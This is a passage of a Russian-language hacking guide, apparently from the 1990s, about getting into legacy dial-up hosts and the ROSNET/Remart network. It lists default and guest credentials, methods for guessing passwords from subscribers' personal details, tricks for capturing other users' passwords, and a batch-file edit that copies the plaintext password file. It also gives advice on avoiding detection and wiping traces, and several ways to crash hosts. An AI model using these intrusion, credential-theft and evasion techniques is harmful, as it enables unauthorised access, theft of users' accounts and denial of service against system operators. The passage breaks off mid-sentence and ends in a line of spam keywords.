Iris позволяет неограниченные попытки при хакинге, и не сохраняет никаких журналов неудачных попыток.
VM/CMS.
VM/CMS - операционная система, выполняемая в IBM. Когда вы соединяетесь с одной из них, вы получите сообщение, наподобие
VM/370 ONLINE
затем подсказку ".". Чтобы войти, наберите:
LOGIN
NOS.
NOS созданы для Networking operation system, и выполняются на компьютере Cyber, созданном Control Data Corporation. NOS идентифицируют себя с готовностью, с заголовком
Welcome to the NOS Software System. Copyright Control Data 1978, 1987
Первая подсказка, которую вы получите, будет
Family:
В ответ нужно нажать return, тогда вы получите подсказку
user name:
Имена пользователя - типичные 7 символов буквенно-цифрового характера. Отчетность оператора начинается с цифры, типа 7ETPDOC.
Decserver.
Это не совсем компьютерная система, это скорей сетевой сервер, который имеет много различных машин, доступных с его помощью. Decserver может сказать:
Enter Username>
после первого соединения. Это только идентификатор. Напечатайте "c", поскольку это - наименее заметная вещь для ввода. Тогда вы можете получить подсказку
Local>
Наберите здесь:
c
чтобы соединиться с системой. Для получения списка системных имен, напечатайте
sh servises
или
sh nodes
Если у вас есть какие-то проблемы, встроенная подсказка доступна по команде "help". Ищите услуги по имени "modem" или "dial" или что-то подобное, они часто могут быть полезны.
GS/1.
GS/1 - другой тип сетевого сервера. В отличии от Decserver, вы не можете предсказать то, какую подсказку GS/1 шлюз собирается дать вам. Стандартная подсказка
GS/1 >
но это предназначено для системных администраторов. Чтобы тестировать GS/1, набирайте
sh d
Если появиться большой список значений по умолчанию (скорость терминала, подсказка, четность и т.д.), можно смело сказать, что вы находитесь на GS/1. Вы соединяетесь тем же самым способом как и с Decserver, печатая:
C
чтобы выяснить, что системы являются доступными, наберите
sh n
или
sh C
Все вышеупомянутое - это главные типы систем, используемые сегодня. Имеются сотни вариантов этих систем, но написанного здесь должно хватить, чтобы дать вам возможность начать.

наверх

Список программ.

Ниже приведен список программ для начинающего хакера. Эти программы не сделают из вас хакера и использование их необязательно для того, чтобы стать им. Эти инструменты (программы) помогут вам узнать много полезного и необходимого.
ToneLoc v1.10.
Эта программа является сканером. Задача этой программы просканировать местную телефонную линию на наличие модема на другом конце.
Cracker Jack v1.4.
Крекер паролей. Эта программа работает под DOS и задача ее состоит в нахождении и взломе пароля под UNIX.
Hacker's Utility v1.02.
Эта программа включает в себя множество полезных утилит. В нее входит:
 крекер паролей
 генератор паролей
 post scanner
 finger lookup
 file extractor и многое другое...
CyberKit v2.4.
В этой программе есть:
 TraceRoute
 Whols
 Finger
 Name Server Lookup
 Time Synchronizer
 Quote of the Day и многое другое...
PGP Freeware v5.0.
Эта программа предназначена для шифрования информации.
7th Sphere PortScan v1.1.
Полезный и очень быстрый сканер портов. Очень прост в установке и работе.
А теперь два главных правила:
1. Что бы стать хакером понадобится много времени. Чтобы научиться чему-нибудь есть только один путь - вы должны читать и еще раз читать. Со временем у вас будут появляться вопросы, тогда задайте их тому, кто знает, например на крэкерских и хакерских форумах.
2. Изучайте программирование, язык скриптов, а предпочтительнее языки под UNIX (C++, Perl, JavaScript и другие). Так же следует изучать OS UNIX, протоколы TCP/IP.

наверх

Вместо примера (или как ломалась сеть РОСНЕТ).

Несколько основных положений.
1. Для начала вы должны осознать, что ничего серьезного лучше не хакать (либо делать это очень осторожно), так как вас могут очень быстро найти. У администратора системы высвечивается куча всякой информации. С помощью этой информации, он легко определяет город, из которого вы вошли в Роснет, а также номер узла и номер канала, по которому вы вошли, так же возможно определить и промежуточную сеть, из которой вы вышли в Роснет. А зная город, не составит большого труда найти и абонента, который в этот промежуток времени висел на номере входа в Роснет. Можно, конечно, войти сначала в одну сеть, из нее в другую, а потом в третью и т.д., а потом в Роснет, и это бесспорно замедлит поиск, но не исключит его.
2. Заниматься своим "темным" делом вы должны с 20:00 (не ранее) до 00:00 часов местного времени. Так как в это время админы уже не работают, а следовательно не следят за системой. Но иногда админы работают круглосуточно. А выйти до 00:00 нужно потому, что Ремарт регистрирует дату последней связи, а в 00:00 вся информация обнуляется. Обнулить информацию можно и другим способом - повесив Ремарт. Так же следует помнить, что во многих системах производится закрытие хоста на ночь (обычно это период 00:00 - 03:00). Никогда не пытайтесь что-нибудь сломать днем или утром, все ваши попытки будут пресечены, а если админ сильно рассердится, то и демо-вход закроет.
3. Перед тем, как что-нибудь хакать войдите на хост под гостевым паролем (если такой имеется) и сразу же введите "/u", чтобы убедиться, что в данный момент в системе нет админа, или лиц к нему приближенных. Как только убедились, что админа нет, вводите "/r", чтобы посмотреть, насколько давно админ был в системе. Если все OK - приступайте:
4. Если вы зашли в систему, попытайтесь залезть в директорию админа системы
GO ADMIN
редко, но иногда получается, если спросят пароль - попытайтесь подобрать (хотя админы любят абсолютно "левые" крутые пароли). В директории админа есть куча файлов с наиполезнейшей информацией.
5. Пробравшись под взломанным логином в меню регистрации, ни в коем случае не меняйте пароль абонента и не переводите его деньги на другой счет. Админ это обязательно заметит, и примет меры.
6. После того, как вы лазили под чьим-то логином, обязательно перезайдите под гостевым входом n-е количество (везде по-разному) раз. Этим вы забьете информацию о входивших пользователях - "/r" будет показывать, что последние десять раз входил "гость".
7. Если вы делали что-то, что другим знать необязательно, повводите какой-нибудь макрос (примерно раз тридцать). Этим вы исключите просмотр выполнявшихся вами команд по "/e?".
Как найти выход в РОСНЕТ.
Номер телефона Роснета вы можете узнать очень просто - из списка телефонов Роснета по СНГ. Но возможно, что указанные номера телефонов уже не являются выходом в Роснет, так как их могли по какой-нибудь причине сменить. В этом случае, вы можете заняться сканингом. То есть взять скрипт или соответствующую программу и перебрать номера в городе на предмет коннекта.
Определение системы и обнаружение гостевого входа.
Для большинства хаков вам нужно иметь хотя бы минимальный доступ на хосте. Поэтому мы решили начать именно с этого. Итак, допустим у вас есть горка адресов разных хостов, что же делать дальше? Нужно проверить работоспособность этих адресов, выяснить какая система там установлена, уровень его защищенности и имеет ли этот хост гостевой вход.
И так, допустим вы зашли на какой-нибудь приглянувшийся вам хост.
Систему можно определить конечно же по приглашению.
Примеры приглашений свойственных той или иной системе:
Ремарт.
Display ANSI graphics ([Y]/N)? >
[...Какой-нибудь текст (его может и не быть)...]
UserID:
Password:
Дионис.
ENTER YOUR NAME =>
PASSWORD =>
LANGUAGE =>
REX400.
Logical Channel: 0
REX400 v4.54.02, Copyright (C) 1992-1996, Club400 Ltd.
>>
^^^^^^^
M) Mail H) Help G) GateWay Q) Quit
Multi Host>
CISCO-Маршрутизатор.
User Access Verification
Password:
Если вы обнаружите Ремарт, начинайте проверять хост на наличие гостевого входа, пробуйте следующие комбинации:
(UserID/Password):
Demo/Demo Test/Test Guest/Guest Gast/Gast Gost/Gost User/User
Demo/Guest Test/Guest Guest/Test Gast/Demo Gost/Demo User/Demo
Demo/Test Test/Demo Guest/Demo Gast/Guest Gost/Guest User/Guest
Demo/Gast Test/Gast Guest/Gast Gast/Test Gost/Test User/Test
Demo/Gost Test/Gost Guest/Gost Gast/Gost Gost/Gast User/Gast
Demo/User Test/User Guest/User Gast/User Gost/User User/Gost
Demo/New Test/New Guest/New Gast/New Gost/New User/New
Demo/Temp Test/Temp Guest/Temp Gast/Temp Gost/Temp User/Temp
New/New Temp/Temp
New/Demo New/Test New/Guest New/Gast New/Gost New/User
Temp/Demo Temp/Test Temp/Guest Temp/Gast Temp/Gost Temp/User
Перепробуйте так же все приведенные комбинации, добавляя цифры, например:
Deno1/Demo1
и т.д., потом попробуйте просто перечисленные логины без паролей. Для ускорения этого процесса используйте скрипт. В среднем за ночь один хост (при помощи скрипта) вы "проштудируете".
Если гостевого входа нет.
Если демо-вход не обнаружено, то попробуйте следующее:
UUCP/UUCP
этот пароль стоит в Ремарте по умолчанию и часто админы забывают его сменить.
UUCP/PCUU
Возможно пароль будет такой:
UUCP/UUADMIN
А может и такой.
В общем пофантазируйте, может быть что-нибудь получиться. Если это не помогло, то попробуйте следующее:
Alex/Alex Luda/Luda Boris/Boris Yura/Yura Olga/Olga Alexey/Alexey Dima/Dima Dmitry/Dmitry Nik/Nik Elena/Elena Lena/Lena и т.д.
Если ничего не получилось, то хост неплохо защищен и чтобы хакнуть его вам придется потрудиться.
Как узнать ID.
Если вы вошли в систему, попытайтесь узнать список пользователей данного хоста.
Узнать список можно, если попасть в меню "Регистрация". В этом меню можно ознакомиться с полным списком абонентов данного хоста. Если через меню вход закрыт, попробуйте так:
go reg
или
go registry
или
go onboard1
onboard - раздел регистрации.
Для того, чтобы узнать имя раздела нужно попасть в раздел MAIN (GO MAIN или через меню системы пункт "Библиотека" и вызвать дерево директорий TREE, либо TYPE LIB или TYPE LIBS или TYPE LIBTREE.
1 - номер меню "Список абонентов".
Совсем недавно был замечен глюк, в частности на 6100255 список абонентов можно было узнать, просто скачав дерево директорий, там для каждого пользователя системы был создан одноименный каталог, к сожалению, этот глюк быстро закрыли.
Если список взять не удалось, придется доставать ID другим способом. Залезьте в библиотеку и там, исходя из того, что к каждому файлу пишется имя абонента, можно получить несколько ID. Теперь если есть доступ к почте, таким же образом можно посмотреть ID авторов писем. Если этих ID вам мало, можно, орудуя /u и /r "выловить" еще 10-15 ID. Потом вызывайте паспорта найденных абонентов (/a ). "Сграбьте" их в один файл. Теперь вы располагаете достаточной информацией о пользователях - можно приступать к подбору пароля.
Подбор пароля.
Если вас не устраивают ваши полномочия, попробуйте подобрать пароль у какого-нибудь другого пользователя.
Подбор бывает трех типов:
1 - Подбор паролей по словарю (словарный метод);
2 - Перебор (подбор пароля путем перебора);
3 - Интеллектуальный подбор (подбор с использованием дополнительной информации и о пользователях.
Для первых двух способов подбора вы можете использовать скрипт, или осуществлять все действия "руками", первое, как вы понимаете, предпочтительнее. Третий способ придется осуществлять "ручками".
Ниже приводятся некоторые сведения, которые помогут вам при подборе пароля:
 Большим недостатком Ремарта является то, что большие и малые регистры не различаются.
 Логин и пароль могут совпадать.
 Пароль может быть из трех символов.
 Пароль не может превышать 8 символов.
 Неограниченное количество попыток при вводе пароля.
 Несомненно вам помогут списки пользователей хоста.
Неограниченное количество попыток при вводе пароля.
Итак, чтобы на перебор паролей затрачивалось меньше времени, то есть, чтобы вам предоставлялось неограниченное количество попыток при вводе пароля, нужно сделать следующее.
Ваш друг заходит на хост (допустим под логином Demo и паролем Demo). После того, как он зашел на хост под Demo/Demo, вы тоже начинаете пытаться зайти на этот хост под тем же логином. Вам сообщают следующее (или что-то вроде этого):
Абонент с таким логином уже работает в системе!
Если Вы не знаете, кто бы это мог быть, и если это действительно Ваш логин, то срочно обратитесь к администоатору системы за разъяснениями.
Вы можете позвонить по телефону 206-85-70 или 924-74-85.
И снова просят ввести ID и Password. Повторяете вышеуказанное три раза (используете три попытки). И после этого можете пробовать любые логины с любыми паролями бесконечное число раз!
К сожалению, как и многие другие "дыры", эту тоже кое-где прикрыли. Так что она проявляется не везде.
Интеллектуальный подбор пароля.
Итак, у вас есть несколько (или все) ID на интересующем вас хосте, так же у вас есть паспорта этих ID. Самое время приступить к интелектуалному подбору паролей.
Возьмем произвольного абонента:
Логин Фамилия/Имя Отчество/
Телефон /Фирма /Город
Ukrpack Лазарев/Андрей Михайлович/
(0482) 33-31-78/СП "ТЕЛНЕТ"/г.Одесса
Поехали:
Ukrpack/Ukrpack
Ukrpack/Kcaprku - наоборот
Ukrpack/ Andrew - имя
Ukrpack/Andy - имя
Ukrpack/Andrey - имя
Ukrpack/Fylhtq - имя (русскими буквами на английском регистре)
Ukrpack/Kfpfhtd - фамилия (русскими буквами на английском регистре)
Ukrpack/Vb[fqkjdbx - отчество (русскими буквами на английском регистре)
Ukrpack/Lam - ФИО
Ukrpack/Aml - ИОФ
Ukrpack/Mal - ОИФ
Ukrpack/Lma - ФОИ
Ukrpack/333178 - телефон
Ukrpack/Telnet - фирма
Ukrpack/Ntkytn - фирма (русскими буквами на английском регистре)
Ukrpack/Odessa - город (кстати, именно такой пароль и был)
Ukrpack/Jltccf - город (русскими буквами на английском регистре)
Так же проходимся по все остальным логинам, пять-шесть "лопухов" - это практически гарантия.
Еще кое-что о подборе паролей.
Самый лучший результат от подбора вы получите совместив все три способа. Сначала перебором перебираете варианты паролей от трех до пяти (включительно) символов. Пароли более большей длины вам врят ли удастся перебрать, так как количиство комбинаций расчитываеться по следующей формуле:
X=S№
где X - количество комбинаций, S - число символов используемых для перебора, и № - число символов в пароле. Поэтому после того, как вы перебрали все пароли в диапазоне от трех до пяти символов, вы точно знаете, что пароль состоит из шести и более символов (в противном случае вы его подобрали).
Приступайте к подбору по паспорту абонента, если все еще не удалось подобрать пароль, начинайте перебор по словарю с "плохими паролями" (типа "qwerty" и "secret") удалите из него трех, четырех и пятисимвольные пароли (так как вы их уже перебрали) и приступаете к перебору и помните - главное терпение.
Как узнать пароль абонента посредством "/U".
Также пароль можно можно узнать следующим способом:
 Зайдите на хост.
 Залогиньтесь под любым логином.
 Включите в своей "терминалке" функцию Capture. И вводите:
/u
/u
...
/u
Если вам повезет, то какой-нибудь юзер-остолоп в спешке введет вместо ID свой пароль, и он у вас благополучно зафиксируется в Сар'е.
Лучше всего вышеуказанную операцию производить при помощи скрипта.
Как узнать пароль абонента посредством "/Е ?".
Интересной возможностью Ремарта, является команда /е?. Эта команда выводит список предыдущих команд. Посмотрев их, часто можно узнать много интересного.
Кардинально новый способ взлома логика.
Имеется одна интересная особенность узла РОСНЕТ: если войти в какой-нибудь хост и наглым образом обломать связь, т.е. вырубить модем или перегрызть провода, а потом сразу после этого позвонить на узел, то оказывается, что ты опять в том-же хосте. Вот это и является основным ключом метода!
Самое главное - это дождаться пока какой-нибудь несчастный позвонит на роснетовский модем. Иногда это ожидание оказывается самым тяжким. Если-же вы все же дождались этого момента, то прежде всего надо убедиться, что это не кто-то из друзей лезет куда-то под гостем. Теперь необходимо позвонить в "Бюро ремонта ГТС" и попросить срочно проверить номер N (т.е. номер РОСНЕТ'а) и тут-же пытаться дозвониться на него. На ГТС увидят, что номер N занят и просто обломают ему коннект в качестве профилактического действия. Если вам повезло, то у того юзера, которого вы обломали, есть опция "Регистрация", а там вы можете посмотреть пароль нажатием кнопки "Z" (это для Ремарт систем).
У этого метода есть один большой недостаток: все это нужно делать в будничный день, в часы работы "Бюро ремонта ГТС", т.е. днем, когда любой нормальный хакер спит...
Как получить USRACC.DAT.
Интересной особенностью Ремарта является то, что имена и пароли юзеров хранятся в файле datusracc.dat в незашифрованном виде, а это значит, что, если "уволочь" этот файл, из него можно почерпнуть множество интересного.
Но существенной преградой является то, что обычно (если, конечно, админы не лопухи) каталог, где хранится Ремарт, не попадает в доступные разделы библиотеки. Чтобы его достать, необходимо иметь приоритет не ниже 30000 (вернее, приоритет определяется конфигурацией данного Ремарта и может быть изменен).
Чтобы "уволочь" usracc.dat можно использовать один из следующих способов.
Способ 1.
Если вы знаете полный путь к файлу usracc.dat, то забрать этот файл не составит труда (местонахождения usracc.dat часто можно выудить из файла структуры библиотеки в виде дерева).
Напишите письмо к самому себе, с аттачем в виде полного пути к useracc.dat на хосте. При совпадении определенных событий может прийти (должны быть заняты каналы!) не все, но загруженность должна быть велика. Данная "фича" на 6100255 не работает.
Способ 2.
Предположим, вы уже в Ремарте, и у вас есть надлежащий приоритет для создания раздела. Как это проверить? Войдите в библиотеку и проверьте список доступных команд, введя "?;" если в конце списка будет команда ml, вас можно поздравить.
Далее действия следующие:
1. Создайте раздел, указывающий на корень диска с: и с именем, к примеру, С:
ml /d с с:
Параметр /d указывает на то, что должен создаваться dos-раздел.
Перейдите в раздел с командой с: и получите:
С >
Затем командами cd и dir тщательно исследуйте подопытный раздел на предмет наличия там программных файлов Ремарта (они обычно размещаются в каталоге emart или emart.40, но могут быть и варианты)
Если РЕМАРТ не удалось найти в данном разделе, грохните его (раздел) командой
rl с
создайте новый раздел, указывающий на корень d:, и проделайте вышеописанную операцию с ним. Так продолжайте до умопомрачения, или пока вас не выгонит админ.
Дальше диска i: продолжать бессмысленно, поскольку РЕМАРТ в начальной своей конфигурации позволяет даунлоадать файлы только с дисков с, d. e, f, g, h, 1, но можно и попробовать...
2. Если вы нашли каталог Ремарта, полюбуйтесь на файл usracc.dat в подкаталoгe dat. He пытайтесь даунлоадать его немедленно или смотреть по type - в лучшем случае система выдаст что-то вроде "Файл занят другим пользователем", а в худшем - зависнет, и все ваши безобразия будут видны как на ладони.
3. Даунлоадните из главной директории Ремарта файл remart.bat и тщательно изучите его. Обратите внимание на ту часть, которая содержит информацию о "ночной перегенерации". Желательно скинуть и те файлы, которые пакетник грузит.
Просмотрите его на предмет команд типа pause и других - необходимо, чтобы Ремарт нормально перезагрузился, иначе, встретив команду типа pause, он будет ждать напряга клавиши на главной консоли, а Вы останетесь ни с чем.
Обычно remart.bat в процессе ночной чистки вызывает cleanup.bat, в котором содержатся команды вызова внешних модулей. В инсталляционном виде remart.bat вызывает чистку и перезапускается. Вот cleanup.bat нам-то и нужен!
Не пытайтесь исправлять remart.bat - dos в таком случае выдает ругательство batch file missing, и главная консоль зависает.
4. Просмотрите cleanup.bat командой:
type cleanup.bat
и запомните его содержимое. Теперь сделайте:
del cleanup.bat
если у вас на это есть соответствующие права - и заново его наберите:
type cleanup.bat
Наберите строки, которые ранее там были; в конец (или начало) этого файла вставьте строку вида:
сору С:PFMART.40DATUSRACC.DAT С:
Вместо remart.40 вставьте имя соответствующей директории, подправьте имена дисков, чтобы можно было найти файл, и чтобы его копию можно было впоследствии слить.
5. Теперь самое время перезапустить РЕМАРТ. Узнайте, кто работает в системе, и, если это левые юзера, ненавязчиво отключите их. Лучше всего это сделать командой hangup, поскольку если юзер видит у себя "ноу карриер", он списывает это на недостатки нашей с вами связи, а если РЕМАРТ ему выдаст что-то типа "Сейчас будет вежливый останов системы", он может призадуматься.
После того, как в системе не останется юзеров (делать это надо быстро), запустите перегенерацию командой cleanup из функций администратора и закончите свой сеанс.
6. РЕМАРТ выйдет, пакетник remart.bat запустит соответствующие проги, cleanup.bat (если Вы ничего не перепутали) и запустит опять Ремарт.
Ну а вы в то время должны терпеливо звонить и ждать. Желательно войти в систему первым (на всякий случай).
7. Теперь очень просто. Оттуда, куда вы указали копирование usracc.dat, даунлоадните его, удалите командой del (не со своего винта!..) и бегите опять в каталог Ремарта. Там восстановите cleanup.bat.
8. Напоследок грохните созданный вами раздел командой:
rl имя_раздела
9. Можно грохнуть и аудит-файл...
Получение полномочий администратора.
Чтобы получить права администратора, имеется очень старый и древний способ.
Договариваетесь со своим другом о том, что в одну и ту же секунду (!) вместе лезете на один и тот же хост. И оба вводите admin/admin, одному из вас система скажет, что пароль не верный, другой зайдет в систему под admin'oM. Главное все это делать одновременно.
Как повесить хост РЕМАРТА.
Повесить хост можно одним из следующих способов:
Способ 1.
Зайдите на какой-нибудь хост. На вопрос системы: "Display ANSI Graphics ([Y]/N)? >", введите "@". На некоторых хостах сразу же вешается. На некоторых появляется две строки:
Login:
Password:
Теперь резко начинайте вводить всякую лабуду, не забывая жать Enter. Через некоторое время (10-20 сек.) хост повиснет.
Надо заметить, что на многих хостах этот метод не проходит, ввиду самодеятельности админа. То есть, обычно для устранения этой "дыры", символ "@" заменяют каким-нибудь другим. Так же нужно помнить, что хост будет висеть не долго (5-6 мин.).
Способ 2.
Зайдите на какой-нибудь хост. Залогиньтесь под любым существующим логином. Введите "/е" (Редактор команд), и начинайте вводить лабуду, в данном способе Enter жать не надо! Вскоре после заполнения строки, курсор сам перейдет на следующую, повторите это три раза (заполните три строки). После заполнения третьей строки хост повиснет. Для использования этого приема нужна тренировка, так что не огорчайтесь, если сначала у вас не будет ничего получаться. Самый лучший вариант, это поставить у себя Ремарт и потренироваться.
Способ 3.
Зайдите на какой-нибудь хост. Залогиньтесь под логином, имеющем доступ к меню регистрации. Зайдите в меню регистрации и введите левую команду (например, dir). Ремарт виснет.
Способ 4.
Зайдите на какой-нибудь хост. Залогиньтесь под любым существующим логином. Позовите какого-нибудь абонента на чат: "/с " и быстро "бегите" - "GO EMAIL". Если на вас попадут в момент перехода, то хост повиснет.
Способ очень "дубовый", п

Хакурство книги хакерства як стать хакером взлом почти